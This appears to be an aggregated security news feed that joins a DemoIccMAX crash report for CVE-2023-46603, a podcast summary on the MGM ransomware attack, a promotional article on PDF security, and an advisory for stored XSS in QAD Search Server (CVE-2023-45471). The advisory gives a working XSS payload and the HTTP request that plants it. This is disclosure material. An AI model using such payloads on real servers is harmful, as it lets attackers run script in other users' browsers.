    DE <= 2.0 (   33627):  16.7%
    DE <= 3.0 (   36466):  18.1%
    DE <= 5.0 (   42342):  21.0%
    DE <=10.0 (   58679):  29.1%
    Total     (  201613)
    

**Build**

    cmake -DCMAKE_INSTALL_PREFIX=$HOME/.local -DCMAKE_BUILD_TYPE=Debug -DCMAKE_CXX_FLAGS="-g -fsanitize=address -fno-omit-frame-pointer -Wall -std=c++17" ../Build/Cmake
    make
    

**Testing****OS**

    ProductName:		macOS
    ProductVersion:		14.0
    BuildVersion:		23A344
    

**Platform****Data**

Various inputs from CVE-2022-26730 and CVE-2023-32443 were used as PoC's

**Crash Reports****icFixXml(char\*, char const\*) + 410**

    Crashed Thread:        0  Dispatch queue: com.apple.main-thread
    
    Exception Type:        EXC_BAD_ACCESS (SIGSEGV)
    Exception Codes:       KERN_INVALID_ADDRESS at 0x00007ff7b34d7000
    Exception Codes:       0x0000000000000001, 0x00007ff7b34d7000
    
    Termination Reason:    Namespace SIGNAL, Code 11 Segmentation fault: 11
    Terminating Process:   exc handler [9557]
    
    VM Region Info: 0x7ff7b34d7000 is not in any region.  Bytes after previous region: 1  Bytes before following region: 1519771648
          REGION TYPE                    START - END         [ VSIZE] PRT/MAX SHRMOD  REGION DETAIL
          Stack                    7ff7b2cd7000-7ff7b34d7000 [ 8192K] rw-/rwx SM=SHM  thread 0
    --->  GAP OF 0x5a95e000 BYTES
          unused __TEXT            7ff80de35000-7ff80de9d000 [  416K] r-x/r-x SM=COW  ...ed lib __TEXT
    
    Thread 0 Crashed::  Dispatch queue: com.apple.main-thread
    0   iccToXml                      	       0x10cadb4fa icFixXml(char*, char const*) + 410
    1   iccToXml                      	       0x10ca90027 CIccTagXmlTextDescription::ToXml(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>&, std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>) + 1431
    2   ???                           	0x6161616161616161 ???
    
    
    Thread 0 crashed with X86 Thread State (64-bit):
      rax: 0x00007ff7b34d7000  rbx: 0x000000010d301bf0  rcx: 0x0000000000000061  rdx: 0x00007ff7b34d7001
      rdi: 0x00007ff7b34d6e62  rsi: 0x00007ff7b34d6e68  rbp: 0x00007ff7b34d4310  rsp: 0x00007ff7b34d42b0
       r8: 0x0000000000000006   r9: 0x0000000000000000  r10: 0x000000000000000d  r11: 0x00007ff6a68674fd
      r12: 0x00007ff7b34d6600  r13: 0x0000000000000000  r14: 0x000000010ca2b650  r15: 0x00007ff7b34d6780
      rip: 0x000000010cadb4fa  rfl: 0x0000000000010202  cr2: 0x00007ff7b34d7000
      
    Logical CPU:     0
    Error Code:      0x00000006 (no mapping for user data write)
    Trap Number:     14
    
    Thread 0 instruction stream:
      44 19 00 e8 42 52 17 00-48 8b 75 e8 48 81 c6 04  D...BR..H.u.H...
      00 00 00 48 89 75 e8 48-89 45 a8 e9 42 00 00 00  ...H.u.H.E..B...
      48 8b 7d e8 48 8d 35 ac-44 19 00 e8 1a 52 17 00  H.}.H.5.D....R..
      48 8b 75 e8 48 81 c6 04-00 00 00 48 89 75 e8 48  H.u.H......H.u.H
      89 45 a0 e9 1a 00 00 00-48 8b 45 f0 8a 08 48 8b  .E......H.E...H.
      45 e8 48 89 c2 48 81 c2-01 00 00 00 48 89 55 e8  E.H..H......H.U.
     [88]08 48 8b 45 f0 48 05-01 00 00 00 48 89 45 f0  ..H.E.H.....H.E.	<==
      e9 69 fe ff ff 48 8b 45-e8 c6 00 00 48 8b 45 f8  .i...H.E....H.E.
      48 83 c4 60 5d c3 55 48-89 e5 48 83 ec 20 48 89  H..`].UH..H.. H.
      7d f8 48 89 75 f0 89 55-ec 48 8b 7d f8 48 8b 75  }.H.u..U.H.}.H.u
      f0 48 63 55 ec e8 ac f0-ff ff 48 8b 7d f8 88 45  .HcU......H.}..E
      eb e8 76 33 17 00 48 83-c4 20 5d c3 66 2e 0f 1f  ..v3..H.. ].f...
    

**CIccPRMG::GetChroma(float, float) + 1093 (IccPrmg.cpp:163)**

    Crashed Thread:        0  Dispatch queue: com.apple.main-thread
    
    Exception Type:        EXC_CRASH (SIGABRT)
    Exception Codes:       0x0000000000000000, 0x0000000000000000
    
    Termination Reason:    Namespace SIGNAL, Code 6 Abort trap: 6
    Terminating Process:   iccRoundTrip [12888]
    
    Application Specific Information:
    abort() called
    
    
    Thread 0 Crashed::  Dispatch queue: com.apple.main-thread
    0   libsystem_kernel.dylib        	    0x7ff80e2357a6 __pthread_kill + 10
    1   libsystem_pthread.dylib       	    0x7ff80e26df30 pthread_kill + 262
    2   libsystem_c.dylib             	    0x7ff80e18ca4d abort + 126
    3   libclang_rt.asan_osx_dynamic.dylib	       0x103b39516 __sanitizer::Abort() + 70
    4   libclang_rt.asan_osx_dynamic.dylib	       0x103b38c74 __sanitizer::Die() + 196
    5   libclang_rt.asan_osx_dynamic.dylib	       0x103b1cf2a __asan::ScopedInErrorReport::~ScopedInErrorReport() + 1178
    6   libclang_rt.asan_osx_dynamic.dylib	       0x103b1c1dd __asan::ReportGenericError(unsigned long, unsigned long, unsigned long, unsigned long, bool, unsigned long, unsigned int, bool) + 1773
    7   libclang_rt.asan_osx_dynamic.dylib	       0x103b1d448 __asan_report_load4 + 40
    8   libIccProfLib2.2.1.15.dylib   	       0x10365ce45 CIccPRMG::GetChroma(float, float) + 1093 (IccPrmg.cpp:163)
    9   libIccProfLib2.2.1.15.dylib   	       0x10365cefe CIccPRMG::InGamut(float, float, float) + 46 (IccPrmg.cpp:170)
    10  libIccProfLib2.2.1.15.dylib   	       0x10365d152 CIccPRMG::InGamut(float*) + 498 (IccPrmg.cpp:183)
    11  libIccProfLib2.2.1.15.dylib   	       0x10365de41 CIccPRMG::EvaluateProfile(CIccProfile*, icRenderingIntent, icXformInterp, bool) + 3169 (IccPrmg.cpp:240)
    12  libIccProfLib2.2.1.15.dylib   	       0x10365ea4f CIccPRMG::EvaluateProfile(char const*, icRenderingIntent, icXformInterp, bool) + 111 (IccPrmg.cpp:288)
    13  iccRoundTrip                  	       0x102913177 main + 1063 (iccRoundTrip.cpp:177)
    14  dyld                          	    0x7ff80dee53a6 start + 1942
    
    
    Thread 0 crashed with X86 Thread State (64-bit):
      rax: 0x0000000000000000  rbx: 0x0000000000000006  rcx: 0x00007ff7bd5f0ce8  rdx: 0x0000000000000000
      rdi: 0x0000000000000103  rsi: 0x0000000000000006  rbp: 0x00007ff7bd5f0d10  rsp: 0x00007ff7bd5f0ce8
       r8: 0x00001ffef7abe1a0   r9: 0x0000000000000000  r10: 0x0000000000000000  r11: 0x0000000000000246
      r12: 0x0000000000000103  r13: 0x2000000000000000  r14: 0x00007ff851846e80  r15: 0x0000000000000016
      rip: 0x00007ff80e2357a6  rfl: 0x0000000000000246  cr2: 0x0000000103ac44b0
      
    Logical CPU:     0
    Error Code:      0x02000148 
    Trap Number:     133
    
    
    Binary Images:
           0x1034bb000 -        0x103836fff libIccProfLib2.2.1.15.dylib (*) <f2dc6eae-a665-30af-bc63-7f6b8c876dad> /Users/USER/Downloads/*/libIccProfLib2.2.1.15.dylib
           0x103a37000 -        0x103b66fff libclang_rt.asan_osx_dynamic.dylib (*) <b5a35b2f-2e39-33dc-88c4-cd4db0ffc80b> /Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/15.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib
           0x10290d000 -        0x102914fff iccRoundTrip (*) <a4db0180-b77f-39cc-bc80-71c3e8b6bbb3> /Users/USER/Downloads/*/iccRoundTrip
        0x7ff80e22d000 -     0x7ff80e267ff7 libsystem_kernel.dylib (*) <3690c1fc-599f-39ff-bbdb-85422e9a996c> /usr/lib/system/libsystem_kernel.dylib
        0x7ff80e268000 -     0x7ff80e273fff libsystem_pthread.dylib (*) <33c43114-85f0-3f32-86d7-8e6a2403d38c> /usr/lib/system/libsystem_pthread.dylib
        0x7ff80e10d000 -     0x7ff80e194fff libsystem_c.dylib (*) <3e9a5bfa-50c0-3a96-9291-4826c62d1182> /usr/lib/system/libsystem_c.dylib
        0x7ff80dedf000 -     0x7ff80df7b2ff dyld (*) <1289b60a-4980-342d-b1a4-250bbee392f1> /usr/lib/dyld
                   0x0 - 0xffffffffffffffff ??? (*) <00000000-0000-0000-0000-000000000000> ???
    
    

**Caveat: Opening Malicious ICC Color Profiles may result in Remote Code Execution in the context of the User**

CVE-2023-46603: Patches for stack buffer overflow at the icFixXml and global buffer overflow in the CIccPRMG::GetChroma functions by xsscx · Pull Request #53 · InternationalColorConsortium/DemoIccMAX

Categories: Podcast
This week on the Lock and Code podcast, we speak with James Fair about the reluctance of some businesses to take cybersecurity seriously, even in the face of major attacks. 



(Read more...)




The post MGM attack is too late a wake-up call for businesses, says James Fair: Lock and Code S04E22 appeared first on Malwarebytes Labs.

_This week on the Lock and Code podcast..._

In September, the Las Vegas casino and hotel operator MGM Resorts became a trending topic on social media... but for all the wrong reasons. A TikTok user posted a video taken from inside the casino floor of the MGM Grand—the company's flagship hotel complex near the southern end of the Las Vegas strip—that didn't involve the whirring of slot machines or the sirens and buzzers of sweepstake earnings, but, instead, row after row of digital gambling machines with blank, non-functional screens. That same TikTok user commented on their own post that it wasn't just errored-out gambling machines that were causing problems—hotel guests were also having trouble getting into their own rooms.

As the user said online about their own experience: “Digital keys weren’t working. Had to get physical keys printed. They doubled booked our room so we walked in on someone.”

The trouble didn't stop there.

A separate photo shared online allegedly showed what looked like a Walkie-Talkie affixed to an elevator's handrail. Above the device was a piece of paper and a message written by hand: “For any elevator issues, please use the radio for support.”  

As the public would soon learn, MGM Resorts was the victim of a cyberattack, reportedly carried out by a group of criminals called Scattered Spider, which used the ALPHV ransomware.

It was one of the most publicly-exposed cyberattacks in recent history. But just a few days before the public saw the end result, the same cybercriminal group received a reported $15 million ransom payment from a separate victim situated just one and a half miles away.

On September 14, Caesar’s Entertainment reported in a filing with the US Securities and Exchange Commission that it, too, had suffered a cyber breach, and according to reporting from CNBC, it received a $30 million ransom demand, which it then negotiated down by about 50 percent.

The social media flurry, the TikTok videos, the comments and confusion from customers, the ghost-town casino floors captured in photographs—it all added up to something strange and new: Vegas was breached. 

But how? 

Though follow-on reporting suggests a particularly effective social engineering scam, the attacks themselves revealed a more troubling, potential vulnerability for businesses everywhere, which is that a company's budget—and its relative ability to devote resources to cybersecurity—doesn't necessarily insulate it from attacks. 

Today on the Lock and Code podcast with host David Ruiz, we speak with James Fair, senior vice president of IT Services at the managed IT services company Executech, about whether businesses are taking cybersecurity seriously enough, which industries he's seen pushback from for initial cybersecurity recommendations (and why), and the frustration of seeing some companies only take cybersecurity seriously after a major attack. 

> "How many do we have to see? MGM got hit, you guys. Some of the biggest targets out there—people who have more cybersecurity budget than people can imagine—got hit. So, what are you waiting for?"

Tune in today to listen to the full conversation.

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

_Show notes and credits:_

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)  
Licensed under Creative Commons: By Attribution 4.0 License  
http://creativecommons.org/licenses/by/4.0/  
Outro Music: “Good God” by Wowa (unminus.com)

MGM attack is too late a wake-up call for businesses, says James Fair: Lock and Code S04E22

Last week on Malwarebytes Labs: Stay safe! Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting...

October 30, 2023 - Last week on Malwarebytes Labs: Stay safe! Malwarebytes Managed Detection and Response (MDR) simply and effectively closes your security resources gap,...

October 29, 2023 - Most, if not all malvertising incidents result from a threat actor either injecting code within an existing ad, or intentionally creating...

October 27, 2023 - Octo Tempest is believed to be a group of native English speaking cybercriminals that uses social engineering campaigns to compromise organizations...

October 27, 2023 - Apple has released security updates for its phones, iPads, Macs, watches and TVs. Updates are available for these products: The important...

October 25, 2023 - VMWare has issued an update to address one out-of-bounds write and one information disclosure vulnerability in its server management software, vCenter Server. Since...

 A week in security (October 16 &#8211; October 22) 

By Owais Sultan
As we progress further into digital life, PDF security has evolved increasingly complex.
This is a post from HackRead.com Read the original post: PDF Security – How To Keep Sensitive Data Secure in a PDF File

Dive into PDF security in the digital era and learn how tools like PDF Expert ensure data protection in electronic documents.

At present, in our digital era, protecting confidential data cannot be overstated. With an ever-increasing array of electronic documents like PDFs, protecting sensitive information has become even more critical. This article delves deep into safeguarding PDF files for confidential data — paying special consideration to PDF Expert as a leading tool in this domain.

****Understanding the Importance of PDF Security****

PDF Expert stands out as an industry leader among apps that allow you to edit pdf on iPhone and other Apple devices — offering intuitive PDF editing functions and sophisticated security measures essential for protecting confidential data.

Their universal compatibility across platforms makes PDFs the go-to document option. However, with widespread use comes responsibility in protecting confidential information, including proprietary business data, personal details, or sensitive financial information. This kind of data needs protection from being accessible by third parties.

****Utilize PDF Expert’s Power for Editing PDFs on iPhone & iPad****

PDF Expert has become renowned for its speed, reliability, and user-friendly interface. Not just limited to minor edits, PDF Expert allows users to make major alterations — editing text and adding links, redacting information, altering images, and even electronically signing documents. For business people in particular, quickly signing and sending contracts is often crucial.

****Advanced Security Features for Increased Protection****

*   **Text Recognition:** One of PDF Expert’s most impressive capabilities is Optical Character Recognition (OCR, also known as text recognition). OCR lets users recognize text from scanned documents to make searchable, highlightable, and editable text — something especially helpful when dealing with older PDFs or documents that haven’t yet been digitized.

*   **Enhance Scans:** Scanned documents from years past may not always look their best due to shadows, distortions, and other imperfections in their contents. PDF Expert’s AI-powered enhanced feature rectifies these problems so every PDF looks perfect regardless of where its origination may lie.

*   **Customization and Personalization:** PDF Expert recognizes that every user has individual requirements. Therefore, it offers customizable features that enable users to arrange their most utilized tools according to their workflow; an example of this is using multiple pens for annotations or quickly adding markup tools for fast access. These tools ensure that users can tailor this platform according to their specifications.

****Every Professional Needs the Appropriate Tool****

PDF Expert can meet the needs of educators, students, construction professionals, and managers across various industries.

****Evolution of PDF Security Solutions****

As we progress further into digital life, PDF security has evolved increasingly complex. Gone are the days when simple password protection would suffice — modern threats require advanced solutions like PDF Expert to combat them effectively.

****Encryption Is A First Line Of Defense****

Encryption is one of the cornerstones of PDF security, ensuring data contained within PDF documents remains unreadable to unauthorized users. Only those possessing a valid decryption key (typically a password) may access its contents; PDF Expert employs advanced algorithms for encryption that ensure your documents remain hidden from prying eyes.

****Redaction: Removing Sensitive Data****

At times, certain parts of a document need to be shared while keeping other sections — which contain sensitive data — confidential. With PDF Expert, redacting information is a seamless process that ensures once data has been redacted, it’s gone for good.

****Digital Signatures Provide Authenticity and Integrity Protection****

When PDF Expert is used to sign PDFs digitally, recipients receive assurances that documents have not been modified while also verifying the signer(s) identity.

****Access Control: Directing Who Views What****

PDF Expert’s features allow document creators to set user permissions, enabling you to determine who can view, edit, print, or copy from their PDF document — providing finely controlled access that ensures even though someone might possess your file, they might not necessarily gain full access.

****Keep Current With Threats With Regular Updates: Staying Abreast****

As digital threats emerge regularly, PDF Expert ensures its software is regularly updated with security patches to stay ahead of them and give its customers access to the safest version possible. PDF Expert’s software updates deliver new features and patch potential vulnerabilities for a safer experience. So, users always receive the safest versions possible of its applications.

****PDF Security and Compliance****

Compliance with data protection regulations has become essential across industries. PDF security has to comply with various regulations, ranging from compliance with trading and investment banking regulations to compliance with regulations like Europe’s General Data Protection Regulation (GDPR) and California Consumer Privacy Act (CCPA), which mandate stringent data security measures for many organizations such as trading.

****How PDFs Fit Into Digital Workflows****

PDFs are indispensable in digital collaboration across various spheres — from contract negotiations to research. With increased reliance on PDF documents comes increased responsibility for maintaining their security at every point during their lifespan. PDF Expert’s suite of tools is tailored specifically towards this responsibility, guaranteeing documents remain protected whether in transit, at rest, or actively edited by staff members.

****Education of the Masses: Awareness Is Required****

PDF Expert provides advanced security features, but humans remain an insecure link in any security network. Therefore, users must be educated on the significance of PDF security best practices, including sharing unprotected documents without first understanding the risks involved, regularly updating software applications, and the need for unique passwords when encrypted.

****Future of PDF Security Solutions****

As technology progresses, so will the methods utilized by malicious actors. Artificial Intelligence, Quantum Computing, and other innovative solutions may present new risks to PDF security. However, with continuous innovation and commitment to staying ahead of the curve, tools like PDF Expert are prepared to face these threats head-on and provide robust protection.

****Accept Feedback and Improve continuously****

PDF Expert, as a user-centric tool, regularly solicits feedback from its user community to meet both current needs and anticipate any upcoming challenges and requirements. By regularly soliciting user input through this feedback loop, PDF Expert ensures it remains current while anticipating any foreseeable challenges or needs in its response to users.

****Conclusion****

PDF security in our increasingly digital world cannot be stressed enough. As physical and digital realms continue to merge, software providers and users must prioritize data protection. PDF Expert is leading this charge so we can hope for a future where our digital documents are as safe as their physical equivalents.

****_RELATED ARTICLES_****

1.  Editing Text in a PDF File
2.  Top 7 PDF Tools to Edit, Merge/Split and Protect PDF
3.  MalDoc in PDF Attack: Hackers Hiding Malicious Word Files within PDFs

PDF Security – How To Keep Sensitive Data Secure in a PDF File

The QAD Search Server is vulnerable to Stored Cross-Site Scripting (XSS) in versions up to, and including, 1.0.0.315 due to insufficient checks on indexes. This makes it possible for unauthenticated attackers to create a new index and inject a malicious web script into its name, that will execute whenever a user accesses the search page.

**CVE ID**: CVE-2023-45471

**Vulnerability Type**: Cross-Site Scripting (XSS)

**Affected product**: QAD Search Server

**Affected versions**: 1.0.0.315 (confirmed), all prior versions (allegedly)

**Description**: The QAD Search Server is vulnerable to Stored Cross-Site Scripting (XSS) in versions up to, and including, 1.0.0.315 due to insufficient checks on indexes. This makes it possible for unauthenticated attackers to create a new index and inject a malicious web script into its name, that will execute whenever a user accesses the search page.

**Steps to reproduce**:

    1. Create a new index
    2. Type the following name: <img src=x onerror=alert(1)>
    
    GET /search/ui/indexes/add/%3Cimg%20src=x%20onerror=alert(1)%3E HTTP/1.1
    Host: <host>:22000
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://<host>:22000/search/ui/indexes/
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: JSESSIONID=9862F2D9B9E8A3C7D8F54FF613D55465
    Connection: close
    
    3. When a user visits the search page, the malicious JavaScript code will execute on their behalf.
    

**PoC**:

**References**:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45471

CVE-2023-45471: GitHub - itsAptx/CVE-2023-45471

Terminal character injection in Mintty before 3.6.3 allows code execution via unescaped output to the terminal.

Tag

#apple